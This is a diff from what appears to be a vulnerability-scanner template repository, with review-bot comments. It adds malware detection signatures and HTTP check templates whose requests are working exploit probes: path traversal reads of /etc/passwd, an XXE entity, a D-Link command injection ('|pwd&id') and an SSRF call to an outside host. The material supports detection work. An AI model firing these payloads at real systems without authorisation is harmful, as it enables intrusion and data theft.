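Review bot: `info.name` in treasurehunt-malware.yaml reads `Trickbot Malware - Detect`, the same name as trickbot-malware.yaml added right after it, although the id, the reference (`MALW_TreasureHunt.yar`) and the string `treasureHunter.pdb` all belong to TreasureHunt. Scan output and triage views usually show the name, so a hit would be attributed to the wrong family; change it to `name: TreasureHunt Malware - Detect`. The same slip is in wabot-malware.yaml later in this commit, whose name `Warp Malware - Detect` collides with warp-malware.yaml and should read `name: Wabot Malware - Detect`.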
@@ -0,0 +1,26 @@ +id: universal-1337-malware + +info: + name: Universal 1337 Stealer Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Stealer.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "2A5B532D502D4C2D492D545D2A" + - "2A5B482D452D522D455D2A" + condition: and + + - type: binary + binary: + - "4654507E" + - "7E317E317E307E30" + condition: and \ No newline at end of file diff --git a/file/malware/unrecom-malware.yaml b/file/malware/unrecom-malware.yaml new file mode 100644 index 0000000000..5a5ea9b335 --- /dev/null +++ b/file/malware/unrecom-malware.yaml @@ -0,0 +1,23 @@ +id: unrecom-malware + +info: + name: Unrecom Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "META-INF" + - "load/ID" + - "load/JarMain.class" + - "load/MANIFEST.MF" + - "plugins/UnrecomServer.class" + condition: and diff --git a/file/malware/urausy-malware.yaml b/file/malware/urausy-malware.yaml new file mode 100644 index 0000000000..a412bb4f7b --- /dev/null +++ b/file/malware/urausy-malware.yaml @@ -0,0 +1,24 @@ +id: urausy-malware + +info: + name: Urausy Skype Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Urausy.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "skype.dat" + - "skype.ini" + - "CreateWindow" + - "YIWEFHIWQ" + - "CreateDesktop" + - "MyDesktop" + condition: and \ No newline at end of file diff --git a/file/malware/vertex-malware.yaml b/file/malware/vertex-malware.yaml new file mode 100644 index 0000000000..b4e68411c8 --- /dev/null +++ b/file/malware/vertex-malware.yaml 
@@ -0,0 +1,26 @@ +id: vertex-malware + +info: + name: Vertex Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "DEFPATH" + - "HKNAME" + - "HPORT" + - "INSTALL" + - "IPATH" + - "MUTEX" + - "PANELPATH" + - "ROOTURL" + condition: and diff --git a/file/malware/virusrat-malware.yaml b/file/malware/virusrat-malware.yaml new file mode 100644 index 0000000000..2cdabae5cd --- /dev/null +++ b/file/malware/virusrat-malware.yaml @@ -0,0 +1,30 @@ +id: virusrat-malware + +info: + name: VirusRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "virustotal" + - "virusscan" + - "abccba" + - "pronoip" + - "streamWebcam" + - "DOMAIN_PASSWORD" + - "Stub.Form1.resources" + - "ftp://{0}@{1}" + - "SELECT * FROM moz_logins" + - "SELECT * FROM moz_disabledHosts" + - "DynDNS\\Updater\\config.dyndns" + - "|BawaneH|" + condition: and diff --git a/file/malware/wabot-malware.yaml b/file/malware/wabot-malware.yaml new file mode 100644 index 0000000000..cabadc8dae --- /dev/null +++ b/file/malware/wabot-malware.yaml @@ -0,0 +1,19 @@ +id: wabot-malware + +info: + name: Warp Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Wabot.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "433A5C6D6172696A75616E612E747874" + - "7349524334" + condition: and \ No newline at end of file diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml new file mode 100644 index 0000000000..2dd06313d1 --- /dev/null +++ b/file/malware/warp-malware.yaml 
@@ -0,0 +1,26 @@ +id: warp-malware + +info: + name: Warp Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Warp.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/2011/n325423.shtml?" + - "wyle" + - "\\~ISUN32.EXE" + condition: or + + - type: binary + binary: + - "80382B7503C6002D80382F7503C6005F" \ No newline at end of file diff --git a/file/malware/xhide-malware.yaml b/file/malware/xhide-malware.yaml new file mode 100644 index 0000000000..daba5648b1 --- /dev/null +++ b/file/malware/xhide-malware.yaml @@ -0,0 +1,20 @@ +id: xhide-malware + +info: + name: xHide Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XHide.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'XHide - Process Faker' + - 'Fakename: %s PidNum: %d' + condition: and \ No newline at end of file diff --git a/file/malware/xor-ddos-malware.yaml b/file/malware/xor-ddos-malware.yaml new file mode 100644 index 0000000000..5a0f709812 --- /dev/null +++ b/file/malware/xor-ddos-malware.yaml @@ -0,0 +1,25 @@ +id: xor-ddos-malware + +info: + name: XOR_DDosv1 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XOR_DDos.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "BB2FA36AAA9541F0" + - "md5=" + - "denyip=" + - "filename=" + - "rmfile=" + - "exec_packet" + - "build_iphdr" + condition: and \ No newline at end of file diff --git a/file/malware/yayih-malware.yaml b/file/malware/yayih-malware.yaml new file mode 100644 index 0000000000..7528720747 --- /dev/null +++ b/file/malware/yayih-malware.yaml 
@@ -0,0 +1,27 @@ +id: yayih-malware + +info: + name: Yayih Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Yayih.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/bbs/info.asp" + - "\\msinfo.exe" + - "%s\\%srcs.pdf" + - "\\aumLib.ini" + condition: or + + - type: binary + binary: + - "8004087A03C18B45FC8034081903C1413B0A7CE9" \ No newline at end of file diff --git a/file/malware/zeghost-malware.yaml b/file/malware/zeghost-malware.yaml new file mode 100644 index 0000000000..e5ab80c5f5 --- /dev/null +++ b/file/malware/zeghost-malware.yaml @@ -0,0 +1,19 @@ +id: zeghost-malware + +info: + name: Zegost Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Zegost.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - '392F6633304C693575624F35444E414444784738733736327471593D' + - '00BADA2251426F6D6500' + condition: and diff --git a/file/malware/zoxpng-malware.yaml b/file/malware/zoxpng-malware.yaml new file mode 100644 index 0000000000..caac47273a --- /dev/null +++ b/file/malware/zoxpng-malware.yaml @@ -0,0 +1,18 @@ +id: zoxpng-malware + +info: + name: ZoxPNG Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_ZoxPNG.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58" diff --git a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt index 804440660c..fb467b1573 100644 
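Review bot: The id and file name in zeghost-malware.yaml spell the family `zeghost`, while `info.name` (`Zegost Malware - Detect`) and the referenced rule file (`MALW_Zegost.yar`) spell it `Zegost`. Anyone filtering templates or results by the family name will miss this one. Pick one spelling for the id, the file name and the name; following the reference, that would be `id: zegost-malware` in `file/malware/zegost-malware.yaml`, with the matching entry in `.new-additions` updated.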
--- a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt @@ -1 +1 @@ -5.2.1 \ No newline at end of file +5.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index 9b4bab7a7e..ac301e4f5c 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.7.7 \ No newline at end of file +5.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-sitemap-generator.txt b/helpers/wordpress/plugins/google-sitemap-generator.txt index 8ead3a843b..068399f864 100644 --- a/helpers/wordpress/plugins/google-sitemap-generator.txt +++ b/helpers/wordpress/plugins/google-sitemap-generator.txt @@ -1 +1 @@ -4.1.12 \ No newline at end of file +4.1.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/health-check.txt b/helpers/wordpress/plugins/health-check.txt index ce6a70b9d8..9dbb0c0052 100644 --- a/helpers/wordpress/plugins/health-check.txt +++ b/helpers/wordpress/plugins/health-check.txt @@ -1 +1 @@ -1.6.0 \ No newline at end of file +1.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index dd9db9fc5d..7d8ebf9eef 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.1.8 \ No newline at end of file +3.1.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kirki.txt b/helpers/wordpress/plugins/kirki.txt index ef8d7569d6..28cbf7c0aa 100644 --- a/helpers/wordpress/plugins/kirki.txt +++ b/helpers/wordpress/plugins/kirki.txt @@ -1 +1 @@ -4.2.0 \ No newline at end of file +5.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index 391e98560b..13d683ccbf 100644 
--- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -2.9.2 \ No newline at end of file +3.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index e9cd0519b8..d873c4a3df 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.88 \ No newline at end of file +0.9.89 \ No newline at end of file diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml new file mode 100644 index 0000000000..53393e1c4f --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-41972.yaml @@ -0,0 +1,43 @@ +id: CNVD-2021-41972 + +info: + name: AceNet AceReporter Report - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + All firewall devices that use the AceNet AceReporter report component can download arbitrary files + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 + - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt + metadata: + max-request: 1 + verified: true + fofa-query: body="Login @ Reporter" + shodan-query: http.favicon.hash:-1595726841 + tags: cnvd,cnvd2021,acenet,acereporter,lfi + +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - 'filename=' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml new file mode 100644 index 0000000000..f1b631ec1f --- /dev/null 
+++ b/http/cnvd/2021/CNVD-2021-43984.yaml @@ -0,0 +1,39 @@ +id: CNVD-2021-43984 + +info: + name: MPSec ISG1000 Security Gateway - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information. + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984 + - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml + metadata: + max-request: 1 + verified: true + fofa-query: "迈普通信技术股份有限公司" + tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg + +http: + - method: GET + path: + - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "text/plain" + - "USGSESSID=" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml new file mode 100644 index 0000000000..69c672ddcf --- /dev/null +++ b/http/cves/2018/CVE-2018-12909.yaml 
@@ -0,0 +1,40 @@ +id: CVE-2018-12909 + +info: + name: Webgrind <= 1.5 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md + - https://github.com/jokkedk/webgrind/issues/112 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12909 + classification: + cve-id: CVE-2018-12909 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 1 + verified: true + fofa-query: app="Webgrind" + tags: cve,cve2018,lfi,webgrind + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - 'webgrind' + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml new file mode 100644 index 0000000000..a9e4221336 --- /dev/null +++ b/http/cves/2018/CVE-2018-18809.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2018-18809 + +info: + name: TIBCO JasperReports Library - Directory Traversal + author: DhiyaneshDK + severity: critical + description: | + The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + reference: + - https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html + - https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-18809 + classification: + cve-id: CVE-2018-18809 + metadata: + max-request: 1 + verified: true + shodan-query: html:"jasperserver-pro" + tags: cve,cve2018,lfi,kev,jasperserver,jasperreport + +http: + - method: GET + path: + - "{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "metadata.jdbc.driverClassName" + - "metadata.hibernate.dialect" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml new file mode 100644 index 0000000000..3207bc02d2 --- /dev/null +++ b/http/cves/2018/CVE-2018-7653.yaml 
@@ -0,0 +1,43 @@ +id: CVE-2018-7653 + +info: + name: YzmCMS v3.6 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter. + reference: + - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-7653 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 1 + fofa-query: title="YzmCMS" + shodan-query: title:"YzmCMS" + tags: cve,cve2018,yzmcms,cms,xss + +http: + - method: GET + path: + - '{{BaseURL}}/index.php?m=search&c=index&a=initxqb4ncu9rs&modelid=1&q=tes' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'YzmCMS' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml new file mode 100644 index 0000000000..5f4cceb6f5 --- /dev/null +++ b/http/cves/2019/CVE-2019-16057.yaml 
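Review bot: As rendered on this page the first entry of the body `words` list is an empty string (`- ''`), and under `condition: and` an empty word matches every response, which would leave `YzmCMS` plus `text/html` plus 200 as the whole test and flag every YzmCMS site, patched or not. If the file really holds the reflected marker there and the markup was lost in rendering, nothing needs to change; otherwise the matcher should require the exact string sent in the `a` parameter. The same empty first word appears in `http/exposures/files/socks5-vpn-config.yaml` further down. The `classification` block here also lacks `cve-id: CVE-2018-7653`, which the other CVE templates in this commit carry.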
@@ -0,0 +1,34 @@ +id: CVE-2019-16057 + +info: + name: D-Link DNS-320 - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-16057 + - https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png + - https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16057 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: html:"ShareCenter" + tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=" + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains_all(body, "uid=", "gid=", "pwd&id") + condition: and diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml new file mode 100644 index 0000000000..c2d5e4242e --- /dev/null +++ b/http/cves/2019/CVE-2019-7192.yaml 
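Review bot: The `tags` line labels this template `lfi`, but the check is an OS command injection (`cwe-id: CWE-78`, "Remote Code Execution" in the name) and reads no file; I would drop the tag: `tags: cve,cve2019,rce,kev,sharecenter,dlink`. Scan profiles that exclude `rce` to avoid running commands on production devices but include `lfi` would otherwise still send this request. A comment above the `dsl` block should also say that the third `contains_all` term appears to be the reflected input, so the verdict rests on `uid=` and `gid=` alone.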
@@ -0,0 +1,80 @@ +id: CVE-2019-7192 + +info: + name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 + - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html + - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-7192 + cwe-id: CWE-863 + metadata: + max-request: 3 + verified: true + shodan-query: 'Content-Length: 580 "http server 1.0"' + tags: cve,cve2019,lfi,rce,kev,qnap,qts + +http: + - raw: + - | + POST /photo/p/api/album.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + a=setSlideshow&f=qsamplealbum + + - | + GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + POST /photo/p/api/video.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - "admin:.*:0:0:" + + - type: word + part: header_3 + words: + - video/subtitle + + - type: status + part: header_3 + status: + - 200 + + extractors: + - type: regex + name: 
album_id + part: body_1 + group: 1 + regex: + - '([a-zA-Z]+)<\/output>' + internal: true + + - type: regex + name: access_code + part: body_2 + group: 1 + regex: + - encodeURIComponent\('([A-Za-z0-9]+)'\) + internal: true diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 1baaecd50d..763520e60b 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -5,50 +5,10 @@ info: author: rootxharsh,iamnoooob,pdresearch severity: high description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection - reference: - - "-" - - " " - - h - - t - - p - - s - - ":" - - / - - w - - i - - e - - r - - . - - c - - o - - m - - a - - n - - b - - u - - "1" - - "2" - - "4" - - "6" - - "8" - - "7" - - "3" - - "0" - - "9" - - "\n" - - y - - l - - g - - d - - v - - G - - H - - S - - L - - x - - C - - V - - E + reference: | + - https://twitter.com/iamnoooob/status/1246182773427240967 + - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype + - https://nvd.nist.gov/vuln/detail/CVE-2020-10199 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 38b6035e41..dfb849d2f5 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml 
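Review bot: Two entries under `reference` in CVE-2019-7192 do not belong to this CVE: the patchstack link is for the All-in-One WP Migration WordPress plugin and the second NVD link is for CVE-2022-2546. They look pasted from another template and should be removed so analysts are not sent to the wrong advisory. The `lfi` tag and `cwe-id: CWE-863` also sit oddly beside "Remote Command Execution" in the name, given that the third request only reads `/etc/passwd`; the description should say the template confirms the file-read step, not code execution.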
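Review bot: In CVE-2020-10199, `reference: |` makes the field a block-scalar string rather than a YAML list, so the three `- https://…` lines become one multi-line string with literal dashes. Every other template in this commit uses a plain `reference:` followed by list items. The removed one-character-per-item list looks like what a formatter produces when it iterates over such a string, so the same corruption may return on the next automated pass. Drop the pipe and keep the three URLs as list items under `reference:`.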
@@ -4,10 +4,11 @@ info: name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery author: Suman_Kar severity: critical - description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. + description: | + Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. reference: - https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24472 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -17,24 +18,24 @@ info: cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/qt-kentharadio" framework: wordpress vendor: qantumthemes product: kentharadio - tags: wordpress,lfi,ssrf,oast,wpscan,cve,cve2021 + tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021 http: - - raw: - - | - GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} + - method: GET + path: + - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me' matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" + - "

Interactsh Server

" - type: status status: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml new file mode 100644 index 0000000000..6fe2dd7f1e --- /dev/null +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-2414 + +info: + name: FreeIPA - XML Entity Injection + author: DhiyaneshDk + severity: high + description: | + Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 + - https://github.com/dogtagpki/pki/pull/4021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-2414 + cwe-id: CWE-611 + metadata: + max-request: 1 + fofa-query: title="Identity Management" + shodan-query: title:"Identity Management" html:"FreeIPA" + verified: true + tags: cve,cve2022,dogtag,freeipa,xxe + +http: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + ]> + + + &ent; + + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: body + words: + - "PKIException" + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 400 diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index cde7464471..c6e7c3148f 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml 
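Review bot: In the second CVE-2021-24472 hunk the new request path `{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me` hard-codes what looks like a page of the test site (`/wp1/home-18/`), where the removed request used the site root. On any other install that path will most likely not exist, and the template then reports an affected site as clean. Use `'{{BaseURL}}/?qtproxycall=https://oast.me'` unless the theme only honours the parameter on that page, and say so in a comment if it does. The match now also depends on the target reaching one fixed third-party host and on that host's landing page text, where the removed `{{interactsh-url}}` form let operators point at their own server. The body word is broken across lines on this page, so the exact string matched cannot be confirmed from here.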
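Review bot: The CVE-2022-2414 `description` never names the affected component or a fixed version; the references and the `dogtag` tag point at Dogtag PKI, while `name` says FreeIPA. A reader deciding what to patch needs that link spelled out: a first sentence stating that the flaw is in the Dogtag PKI component queried at `/ca/rest/certrequests`, plus a `remediation:` line pointing at the fix in the linked pull request.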
@@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml new file mode 100644 index 0000000000..73a5bcfb62 --- /dev/null +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-22478 + +info: + name: KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access + author: DhiyaneshDk + severity: high + description: | + KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-22478 + - https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + 